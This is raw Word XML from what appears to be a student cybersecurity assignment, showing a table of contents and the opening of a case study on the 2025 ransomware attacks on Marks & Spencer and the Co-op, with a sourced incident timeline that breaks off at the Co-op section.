          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1917D523" w14:textId="099BB1A5" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="5B373E0C" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51AD2E46" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BD5137C" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Rules of Engagement (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>RoE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38597701" w14:textId="567D5E90" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="2DA0680B" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="715446A5" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4927248C" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Threat Emulation Plan &amp; MITRE ATT&amp;CK Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DB1EB64" w14:textId="5EEEAC72" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="339D9F93" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DC44CA1" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EBCA622" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Laboratory Environment Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="563E6B0C" w14:textId="33AD2B32" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="498DB439" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40FF99AD" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28B7626F" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Exploitation Campaign Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E47F4F9" w14:textId="196342EE" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="47F58A56" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C47B849" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4675B098" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Detection Gap Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C049C86" w14:textId="4E160780" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="246D4094" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31C8CDEC" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F90B7EA" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Operational Security and Containment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DEC7C66" w14:textId="05F55928" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>33</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="320895F1" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E533A6C" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29F4EDBE" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Conclusion (Task 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="345167D1" w14:textId="6D9EB4C7" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>34</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="3F96FFA8" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E6D104D" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="091713F9" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5565DB32" w14:textId="5A235CDF" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>35</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="215C066D" w14:textId="6BBD495C" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04"/>
    <w:p w14:paraId="6B224172" w14:textId="3933B927" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="106C2289" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="0DB225BB" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="6579B0B8" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="509AE63B" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="6B407FDD" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="0049BCC4" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="246D5AAA" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="20A1B36F" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="5DBEA86F" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="0D60691A" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="4666E3A2" w14:textId="76509B3D" w:rsidR="00053404" w:rsidRPr="00053404" w:rsidRDefault="00053404" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Task 1 - A Critical Analysis of the 2025 Ransomware Campaign Against Marks &amp; Spencer and The Co-operative Group</w:t>
      </w:r>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="181196B1" w14:textId="4E2A435B" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Abstract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CEC808" w14:textId="135E9781" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In April 2025, the Co-Operative Group and Marks &amp; Spencer (M&amp;S) both reported serious cybersecurity incidents when they each suffered several different kinds of </w:t>
      </w:r>
      <w:r w:rsidR="00053404">
        <w:t>cyber-attack</w:t>
      </w:r>
      <w:r>
        <w:t>, including unauthorised access and sophisticated social engineering techniques to commit credential exfiltration of data that was either stolen or exfiltrated through the first stages prior to being encrypted by ransomware. These attacks were especially disruptive during the Easter period when both companies depended heavily on their operational infrastructure, including M&amp;S for e-commerce and shipping operations. According to reports, it is very likely that M&amp;S’ cybersecurity incidents are attributable to the Scattered Spider group and DragonForce ransomware-as-a-service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCE2E7" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF2103" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF98577" w14:textId="00603B49" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82265C" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:r>
        <w:t xml:space="preserve">In April 2015, two major UK retailers, Marks &amp; Spencer and the Co-operative Group, were the victims of some major </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyber attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. It involved some combination of social engineering, credential theft, and ransomware. These are a great example of how today’s threat actors (such as Scattered Spider) skip fancy exploits and instead focus on the human and identity vulnerabilities, such as helpdesks and Active Directory. They started early, remained hidden for months and then really made an impact with ran-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>somware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. I found the Irish Internet Security Forum (IISF) technical briefing and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SpecOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Software analysis of this attack the most clear and comprehensive, which makes this ideal for this assignment. [1,2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B066247" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04"/>
    <w:p w14:paraId="0EF502E1" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B9D27E" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="687C3758" w14:textId="1C0C88BD" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00053404" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Incident Summary and Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0064215C" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t xml:space="preserve">Here’s a clear, fully timeline-drawn from M&amp;S’s Co-op’s official corporate statements, IISF guide, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00115C04">
        <w:t>SpecOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00115C04">
        <w:t xml:space="preserve"> analysis, ICO, and NCA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C60799A" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>February 2025: Attackers first gained early access. The NTDS.dit file, which is the primary Active Directory database that contains password hashes for each domain user, was originally taken by the attackers. For around two months, this early access went unnoticed. [1, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C25BEBF" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>19-21 April 2025 (Easter weekend): Customers started noticing real problems at M&amp;S, con-tactless payments failed, Click &amp; Collect stopped working properly, online orders slowed, and warehouse logistics were disrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F137749" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>22 April 2025: M&amp;S publicly confirmed a “cyber incident” in its official stock-market update while reassuring that physical stores remained open [3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D3F373" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>23 April 2025: M&amp;S issued a further update promising to keep customers informed about ongoing operational changes made to protect systems [3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762F6B00" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>24 April 2025: DragonForce ransomware was deployed, specifically targeting VMware ESXi infrastructure and encrypting critical virtual machines [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1428D251" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>25 April 2025: M&amp;S paused all online orders via its website and apps as part of proactive incident management. [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1935E1" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>2 May 2025: The Information Commissioner’s Office (ICO) confirmed it had received breach reports from both companies and was working closely with the NCSC [5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34EB61" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>May-June 2025: M&amp;S confirmed that some personal customer data (contact details, dates of birth, order history, but no usable payment or card details) had been accessed. M&amp;S began notifying affected customers/members. [6].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4836BEC8" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>July 2025: The National Crime Agency (NCA) announced the arrest of four individuals (aged 17-20) linked to the attacks on M&amp;S, Co-op, and Harrods [7].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7741D0A0" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>Later 2025 (Annual Report): M&amp;S reported an expected £300m+ profit impact for 2025/26. Recovery involved complete network rebuilds [8].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ED7F64" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3CDD24" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>Co-op Incident Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FCA8AA" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
